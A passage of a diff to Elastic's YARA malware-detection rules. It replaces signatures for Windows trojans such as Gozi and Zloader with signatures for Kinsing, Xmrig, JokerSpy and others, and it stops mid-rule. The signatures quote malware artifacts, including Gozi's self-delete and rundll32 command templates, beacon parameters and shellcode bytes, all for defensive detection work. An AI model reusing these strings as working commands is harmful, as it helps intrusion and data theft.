"https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Cryptominer_Generic.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7ac1d7b6107307fb2442522604c8fa56010d931392d606ac74dcea6b7125954b" - logic_hash = "b7289c4688ec67d59e67755461f1f4e0c3f47ef9f8c73fc1dcc1d168baf11623" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Kinsing.yar#L40-L58" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b3527e3d03a30fcf1fdaa73a1b3743866da6db088fbfa5f51964f519e22d05e6" + logic_hash = "9561511710eef5877c5afa49890b77fbad31a6e312b5cd33fc01f91ff2a73583" score = 75 - quality = 75 - tags = "FILE" - fingerprint = "a00e3e08e11d10a7a4bf1110a5110e4d0a4d2acf0974aca9dfc1ad5f21c80df7" + quality = 73 + tags = "FILE, MEMORY" + fingerprint = "6701b007ee14a022525301d53af0f4254bc26fdfbe27d3d5cebc2d40e8536ed6" severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { EF F9 66 0F EF FA 66 0F FE FE 66 0F 6F B0 B0 00 00 00 66 0F } + $a = { 73 74 73 20 22 24 42 49 4E 5F 46 55 4C 4C 5F 50 41 54 48 22 20 22 } condition: all of them } -rule ELASTIC_Windows_Cryptominer_Generic_F53Cfb9B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Kinsing_85276Fb4 : FILE MEMORY { meta: - description = "Detects Windows Cryptominer Generic (Windows.Cryptominer.Generic)" + description = "Detects Linux Trojan Kinsing (Linux.Trojan.Kinsing)" author = "Elastic Security" - id = "f53cfb9b-0286-4e7e-895e-385b6f64c58a" - date = "2024-03-05" - modified = "2024-06-12" + id = "85276fb4-11f4-4265-9533-a96b42247f96" + date = "2021-12-13" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Cryptominer_Generic.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a9870a03ddc6543a5a12d50f95934ff49f26b60921096b2c8f2193cb411ed408" - logic_hash = "b2453862747e251afc34c57e887889b8d3a65a9cc876d4a95ff5ecfcc24e4bd3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Kinsing.yar#L60-L78" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b3527e3d03a30fcf1fdaa73a1b3743866da6db088fbfa5f51964f519e22d05e6" + logic_hash = "6919afd133e7e369eece10ea79d9d17a1a3fbb6210593395e0be157f8c262811" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2b66960ee7d423669d0d9e9dcd22ea6e1c0843893e5e04db92237b67b43d645c" - severity = 50 + fingerprint = "966d53d8fc0e241250a861107317266ad87205d25466a4e6cdb27c3e4e613d92" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 48 81 EC B8 00 00 00 0F AE 9C 24 10 01 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 0F AE 94 24 14 01 00 00 4C 8B A9 E0 00 00 00 4C 8B CA 4C 8B 51 20 4C 8B C1 4C 33 11 ?? ?? ?? ?? ?? ?? 4C 8B 59 28 } + $a = { 65 5F 76 00 64 48 8B 0C 25 F8 FF FF FF 48 3B 61 10 76 38 48 83 } condition: all of them } -rule ELASTIC_Windows_Trojan_Pipedance_01C18057 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Lha_F72Bff9A : FILE { meta: - description = "Detects Windows Trojan Pipedance (Windows.Trojan.PipeDance)" + description = "Name: LHA.sys" author = "Elastic Security" - id = "01c18057-258d-4242-928c-26972a2f1e76" - date = "2023-02-02" - modified = "2023-02-22" - reference = "https://www.elastic.co/security-labs/twice-around-the-dance-floor-with-pipedance" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_PipeDance.yar#L1-L27" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9d3f739e35182992f1e3ade48b8999fb3a5049f48c14db20e38ee63eddc5a1e7" - logic_hash = "0c03a725ae930eb829d6a6a9f681489d61aa7f69e72b6b298776f75a98115398" + id = "f72bff9a-046c-4e02-9e11-4787c8aada75" + date = "2022-04-07" + modified = "2022-04-07" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Lha.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf" + logic_hash = "cea05432b47cf14982bda74476c8c8582068c22fe7dec6468c9756c20412dca2" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "01b8c127974ec8e3db0fc68db8d11cd4f4247c0128a8630f64c7bd20726220af" - severity = 100 + tags = "FILE" + fingerprint = "3b464386a60747131012d8380a34bed9329b02ac5cdc7b69b951f4f681243f35" + threat_name = "Windows.VulnDriver.Lha" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $str1 = "%-5d %-30s %-4s %-7d %s" wide fullword - $str2 = "PID Name Arch Session User" wide fullword - $str3 = "%s %7.2f B" wide fullword - $str4 = "\\\\.\\pipe\\%s.%d" ascii fullword - $seq_rc4 = { 8D 46 ?? 0F B6 F0 8A 14 3E 0F B6 C2 03 C1 0F B6 C8 89 4D ?? 8A 04 0F 88 04 3E 88 14 0F 0F B6 0C 3E 0F B6 C2 03 C8 0F B6 C1 8B 4D ?? 8A 04 38 30 04 0B 43 8B 4D ?? 3B 5D ?? 72 ?? } - $seq_srv_resp = { 8B CE 50 6A 04 5A E8 ?? ?? ?? ?? B8 00 04 00 00 8D 4E ?? 50 53 8B D0 E8 ?? ?? ?? ?? B8 08 02 00 00 8D 8E ?? ?? ?? ?? 50 57 8B D0 E8 ?? ?? ?? ?? } - $seq_cmd_dispatch = { 83 FE 29 0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FE 06 0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C6 33 D2 2B C2 0F 84 ?? ?? ?? ?? 83 E8 01 } - $seq_icmp = { 59 6A 61 5E 89 45 ?? 8B D0 89 5D ?? 2B F0 8D 04 16 8D 4B ?? 88 0A 83 F8 77 7E ?? 80 E9 17 88 0A 43 42 83 FB 20 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 4C 00 48 00 41 00 2E 00 73 00 79 00 73 00 00 00 } condition: - 4 of ($str*) or 2 of ($seq*) + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name } -rule ELASTIC_Windows_Trojan_Zloader_5Dd0A0Bf : FILE MEMORY +rule ELASTIC_Macos_Hacktool_Jokerspy_58A6B26D : FILE MEMORY { meta: - description = "Detects Windows Trojan Zloader (Windows.Trojan.Zloader)" + description = "Detects Macos Hacktool Jokerspy (Macos.Hacktool.JokerSpy)" author = "Elastic Security" - id = "5dd0a0bf-20e4-4c52-b9d9-c157e871b06b" - date = "2022-03-03" - modified = "2022-04-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Zloader.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "161e657587361b29cdb883a6836566a946d9d3e5175e166a9fe54981d0c667fa" - logic_hash = "1446a4147e1b06fa66907de857011079c55a8e6bf84276eb8518d33468ba1f83" + id = "58a6b26d-13dd-485a-bac3-77a1053c3a02" + date = "2023-06-19" + modified = "2023-06-19" + reference = "https://www.elastic.co/security-labs/inital-research-of-jokerspy" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Macos_Hacktool_JokerSpy.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d895075057e491b34b0f8c0392b44e43ade425d19eaaacea6ef8c5c9bd3487d8" + logic_hash = "e9e1333c7172d5a0f06093a902edefd7f128963dbaadf77e829f032ccb04ce56" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "06545df6c556adf8a6844724e77d005c0299b544f21df2ea44bb9679964dbb9f" + fingerprint = "71423d5c4c917917281b7e0f644142a0570df7a5a7ea568506753cb6eabef1c0" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $a = { B6 08 89 CA 80 C2 F7 80 FA 05 72 F2 80 F9 20 74 ED 03 5D 0C 8D } + $str1 = "ScreenRecording: NO" fullword + $str2 = "Accessibility: NO" fullword + $str3 = "Accessibility: YES" fullword + $str4 = "eck13XProtectCheck" + $str5 = "Accessibility: NO" fullword + $str6 = "kMDItemDisplayName = *TCC.db" fullword condition: - all of them + 5 of them } -rule ELASTIC_Windows_Trojan_Zloader_4Fe0F7F1 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Xmrig_57C0C6D7 : FILE MEMORY { meta: - description = "Detects Windows Trojan Zloader (Windows.Trojan.Zloader)" + description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" author = "Elastic Security" - id = "4fe0f7f1-93c6-4397-acd5-1557608efaf4" - date = "2022-03-03" - modified = "2022-04-12" + id = "57c0c6d7-ded1-4a3e-9877-4003ab46d4a6" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Zloader.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "161e657587361b29cdb883a6836566a946d9d3e5175e166a9fe54981d0c667fa" - logic_hash = "b20fafc9db08c7668b49e18f45632594c3a69ec65fe865e79379c544fc424f8d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrig.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "100dc1ede4c0832a729d77725784d9deb358b3a768dfaf7ff9e96535f5b5a361" + logic_hash = "d3a272d488cebe4f774c994001a14d825372a27f16267bc0339b7e3b22ada8db" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f340f41cc69930d24ffdae484d1080cd9ce5cb5e7720868c956923a5b8e6c9b1" + fingerprint = "b36ef33a052cdbda0db0048fc9da4ae4b4208c0fa944bc9322f029d4dfef35b8" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 08 8B 75 F0 85 DB 8D 7D 94 89 45 E8 0F 45 FB 31 DB 85 F6 0F } + $a = { 78 01 66 0F EF C9 49 89 38 0F BE 00 83 E8 30 F2 0F 2A C8 48 } condition: all of them } -rule ELASTIC_Windows_Trojan_Zloader_363C65Ed : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Xmrig_7E42Bf80 : FILE MEMORY { meta: - description = "Detects Windows Trojan Zloader (Windows.Trojan.Zloader)" + description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" author = "Elastic Security" - id = "363c65ed-e394-4a40-9c2a-a6f6fd284ed3" - date = "2022-03-03" - modified = "2022-04-12" + id = "7e42bf80-60a4-4d45-bf07-b96a188c6e6b" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Zloader.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "161e657587361b29cdb883a6836566a946d9d3e5175e166a9fe54981d0c667fa" - logic_hash = "d3c530f9929db709067a9e1cc59b9cda9dcd8e19352c79ddaf7af6c91b242afd" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrig.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "551b6e6617fa3f438ec1b3bd558b3cbc981141904cab261c0ac082a697e5b07d" + logic_hash = "ad8c8f0081d07f7e2a5400de6af2c6b311f77ff336d7576f7fb0bfe2593a9062" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "33ae4cee122269f4342a3fd829236cbd303d8821b548ab93bbebc9dee3eb67f2" + fingerprint = "cf3b74ae6ff38b0131763fbcf65fa21fb6fd4462d2571b298c77a43184ac5415" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 04 8D 4D E4 8D 55 E8 6A 00 6A 00 51 6A 00 6A 00 50 52 57 53 } + $a = { 0F 70 F8 FF 66 0F 73 FD 04 66 44 0F EF ED 66 41 0F 73 FE 04 66 41 0F } condition: all of them } -rule ELASTIC_Windows_Trojan_Zloader_79535191 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Xmrig_271121Fb : FILE MEMORY { meta: - description = "Detects Windows Trojan Zloader (Windows.Trojan.Zloader)" + description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" author = "Elastic Security" - id = "79535191-59df-4c78-9f62-b8614ef992d3" - date = "2022-03-03" - modified = "2022-04-12" + id = "271121fb-47cf-47a7-9e90-8565d4694c9e" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Zloader.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "161e657587361b29cdb883a6836566a946d9d3e5175e166a9fe54981d0c667fa" - logic_hash = "c398a8ca46c6fe3e59481a092867be77a94809b1568cea918aa6450374063857" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrig.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "19aeafb63430b5ac98e93dfd6469c20b9c1145e6b5b86202553bd7bd9e118842" + logic_hash = "f43b1527ad4bbd07023126def89c1af47698cc832f71f4a1381ed0d621d79ed5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ee3c4cf0d694119acfdc945a964e4fc0f51355eabca900ffbcc21aec0b3e1e3c" + fingerprint = "e0968731b0e006f3db92762822e4a3509d800e8f270b1c38303814fd672377a2" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 28 4B 74 26 8B 46 FC 85 C0 74 F3 8B 4E F4 8B 16 39 C8 0F 47 C1 8B } + $a = { 18 41 C1 E4 10 C1 E1 08 41 C1 EA 10 44 89 CB 41 C1 E9 18 C1 } condition: all of them } -rule ELASTIC_Linux_Ransomware_Noescape_6De58E0C : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Xmrig_E7E64Fb7 : FILE MEMORY { meta: - description = "Detects Linux Ransomware Noescape (Linux.Ransomware.NoEscape)" + description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" author = "Elastic Security" - id = "6de58e0c-67f9-4344-9fe9-26bfc37e537e" - date = "2023-07-27" - modified = "2024-02-13" + id = "e7e64fb7-e07c-4184-86bd-db491a2a11e0" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_NoEscape.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "46f1a4c77896f38a387f785b2af535f8c29d40a105b63a259d295cb14d36a561" - logic_hash = "c275d0cfdadcaabe57c432956e96b4bb344d947899fa5ad55b872e02b4d44274" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrig.yar#L61-L78" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "e325ac02c51526c5a36bdd6c2bcb3bee51f1214d78eff8048c8a1ae88334a9e8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "60a160abcbb6d93d9ee167663e419047f3297d549c534cbe66d035a0aa36d806" + fingerprint = "444240375f4b9c6948907c7e338764ac8221e5fcbbc2684bbd0a1102fef45e06" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -60335,141 +61293,113 @@ rule ELASTIC_Linux_Ransomware_Noescape_6De58E0C : FILE MEMORY os = "linux" strings: - $a1 = "HOW_TO_RECOVER_FILES.txt" - $a2 = "large_file_size_mb" - $a3 = "note_text" + $a = { 03 48 89 74 24 48 77 05 48 8B 5C C4 30 4C 8B 0A 48 8B 0F 48 8B } condition: all of them } -rule ELASTIC_Windows_Trojan_Privateloader_96Ac2734 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Xmrig_79B42B21 : FILE MEMORY { meta: - description = "Detects Windows Trojan Privateloader (Windows.Trojan.PrivateLoader)" + description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" author = "Elastic Security" - id = "96ac2734-e36c-4ce2-bb40-b6bd77694333" - date = "2023-01-03" - modified = "2023-02-01" + id = "79b42b21-1408-4837-8f1f-6de30d7f5777" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_PrivateLoader.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "077225467638a420cf29fb9b3f0241416dcb9ed5d4ba32fdcf2bf28f095740bb" - logic_hash = "9f96f1c54853866e124d0996504e6efd3d154111390617999cc10520d7f68fe6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrig.yar#L80-L97" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "db42871193960ea4c2cbe5f5040cbc1097d57d9e4dc291bcc77ed72b588311ab" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "029056908abef6c3ceecf7956e64a6d25b67c391f699516b3202d2aa3733f15a" + fingerprint = "4cd0481edd1263accdac3ff941df4e31ef748bded0fba5fe55a9cffa8a37b372" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $xor_decrypt = { 0F 28 85 ?? ?? FF FF 66 0F EF ?? ?? FE FF FF 0F 29 85 ?? ?? FF FF 0F 28 85 ?? ?? FF FF } - $str0 = "https://ipinfo.io/" wide - $str1 = "Content-Type: application/x-www-form-urlencoded" wide - $str2 = "https://db-ip.com/" wide + $a = { FC 00 79 0A 8B 45 B8 83 E0 04 85 C0 75 38 8B 45 EC 83 C0 01 } condition: - all of ($str*) and #xor_decrypt>3 + all of them } -rule ELASTIC_Windows_Trojan_Gozi_Fd494041 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Xmrig_77Fbc695 : FILE MEMORY { meta: - description = "Detects Windows Trojan Gozi (Windows.Trojan.Gozi)" + description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" author = "Elastic Security" - id = "fd494041-3fe8-4ffa-9ab8-6798032f1d66" - date = "2021-03-22" - modified = "2021-08-23" + id = "77fbc695-6fe3-4e30-bb2f-f64379ec4efd" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Gozi.yar#L1-L32" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237" - logic_hash = "fdd18817e7377f1b4006d3bf135d924b8ead62a461ea56f57157b2856ba6846b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrig.yar#L99-L117" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e723a2b976adddb01abb1101f2d3407b783067bec042a135b21b14d63bc18a68" + logic_hash = "af8e09cd5d6b7532af0c06273aa465cf6c40ad6c919a679fd09191a1c2a302f5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2" + fingerprint = "e0c6cb7a05c622aa40dfe2167099c496b714a3db4e9b92001bbe6928c3774c85" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "/C ping localhost -n %u && del \"%s\"" wide fullword - $a2 = "/C \"copy \"%s\" \"%s\" /y && \"%s\" \"%s\"" wide fullword - $a3 = "/C \"copy \"%s\" \"%s\" /y && rundll32 \"%s\",%S\"" wide fullword - $a4 = "ASCII.GetString(( gp \"%S:\\%S\").%s))',0,0)" wide - $a5 = "filename=\"%.4u.%lu\"" - $a6 = "Urundll32 \"%s\",%S" wide fullword - $a7 = "version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s" ascii fullword - $a8 = "%08X-%04X-%04X-%04X-%08X%04X" ascii fullword - $a9 = "&whoami=%s" ascii fullword - $a10 = "%u.%u_%u_%u_x%u" ascii fullword - $a11 = "size=%u&hash=0x%08x" ascii fullword - $a12 = "&uptime=%u" ascii fullword - $a13 = "%systemroot%\\system32\\c_1252.nls" ascii fullword - $a14 = "IE10RunOnceLastShown_TIMESTAMP" ascii fullword + $a = { F2 0F 58 44 24 08 F2 0F 11 44 24 08 8B 7B 08 41 8D 76 01 49 83 } condition: - 8 of ($a*) + all of them } -rule ELASTIC_Windows_Trojan_Gozi_261F5Ac5 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Xmrig_403B0A12 : FILE MEMORY { meta: - description = "Detects Windows Trojan Gozi (Windows.Trojan.Gozi)" + description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" author = "Elastic Security" - id = "261f5ac5-7800-4580-ac37-80b71c47c270" - date = "2019-08-02" - modified = "2021-08-23" + id = "403b0a12-8475-4e28-960b-ef33eabf0fcf" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Gozi.yar#L34-L60" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f" - logic_hash = "23a7427e162e2f77ee0a281fe4bc54eab29a3bdca8e51015147e8eb223e7e2f7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrig.yar#L119-L137" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "54d806b3060404ccde80d9f3153eebe8fdda49b6e8cdba197df0659c6724a52d" + logic_hash = "5b7662124eb980b11f88a50665292e7a405595f7ad85c5c448dd087ea096689a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c" + fingerprint = "785ac520b9f2fd9c6b49d8a485118eee7707f0fa0400b3db99eb7dfb1e14e350" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" - $a2 = "version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s" - $a3 = "Content-Disposition: form-data; name=\"upload_file\"; filename=\"%.4u.%lu\"" - $a4 = "&tor=1" - $a5 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)" - $a6 = "http://constitution.org/usdeclar.txt" - $a7 = "grabs=" - $a8 = "CHROME.DLL" - $a9 = "Software\\AppDataLow\\Software\\Microsoft\\" + $a = { 00 28 03 1C C3 0C 00 C0 00 60 83 1C A7 71 00 00 00 68 83 5C D7 } condition: - 4 of ($a*) + all of them } -rule ELASTIC_Linux_Exploit_Cornelgen_584A227A : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Xmrig_Bffa106B : FILE MEMORY { meta: - description = "Detects Linux Exploit Cornelgen (Linux.Exploit.Cornelgen)" + description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" author = "Elastic Security" - id = "584a227a-bf17-4620-8b10-97676f12ea5b" - date = "2021-04-06" + id = "bffa106b-0a9a-4433-b9ac-ae41a020e7e0" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Cornelgen.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c823cb669f1d6cb9258d6f0b187609c226af23396f9c5be26eb479e5722a9d97" - logic_hash = "db3b6bbab48074449ae8b404f8fa77d93cde1ab8e57bd4ad981ac2afb8226494" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrig.yar#L139-L156" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "d7214ad9c4291205b50567d142d99b8a19a9cfa69d3cd0a644774c3a1adb6b49" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "65a23e20166b99544b2d0b4969240618d50e80a53a69829756721e19e4e6899f" + fingerprint = "665b5684c55c88e55bcdb8761305d6428c6a8e810043bf9df0ba567faea4c435" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -60477,28 +61407,28 @@ rule ELASTIC_Linux_Exploit_Cornelgen_584A227A : FILE MEMORY os = "linux" strings: - $a = { 6E 89 E3 52 53 89 E1 B0 0B CD 80 31 C0 40 CD 80 } + $a = { 54 24 9C 44 0F B6 94 24 BC 00 00 00 89 5C 24 A0 46 8B 0C 8A 66 0F 6E 5C } condition: all of them } -rule ELASTIC_Linux_Exploit_Cornelgen_Be0Bc02D : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Xmrig_73Faf972 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cornelgen (Linux.Exploit.Cornelgen)" + description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" author = "Elastic Security" - id = "be0bc02d-2d9d-4cbe-9d6a-3a88ffa1234b" + id = "73faf972-43e4-448d-bdfd-cda9be15fce6" date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = 